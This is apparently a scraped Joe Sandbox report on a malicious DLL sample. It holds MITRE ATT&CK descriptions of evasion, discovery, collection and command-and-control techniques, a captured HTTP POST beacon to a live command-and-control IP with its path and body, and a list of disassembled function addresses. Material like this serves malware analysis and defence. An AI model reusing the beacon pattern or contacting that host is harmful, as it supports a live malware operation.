Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uLV6jN2BWh.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exePID: 3380, Parent PID: 1028

Windows Analysis Report
uLV6jN2BWh.dll

Function 6FB91EC0 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 409
networkfileCOMMON

Function 6FB931B0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 477
COMMON

Function 6FB91ED0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 386
networkfileCOMMON

Function 6FB96E7A Relevance: 10.6, APIs: 7, Instructions: 138
COMMONLIBRARYCODE

Function 6FB96F2C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6FB9B423 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Function 6FB96D73 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6FB9B8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 6FB9DDF0 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Function 6FB982C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Function 6FB9B188 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON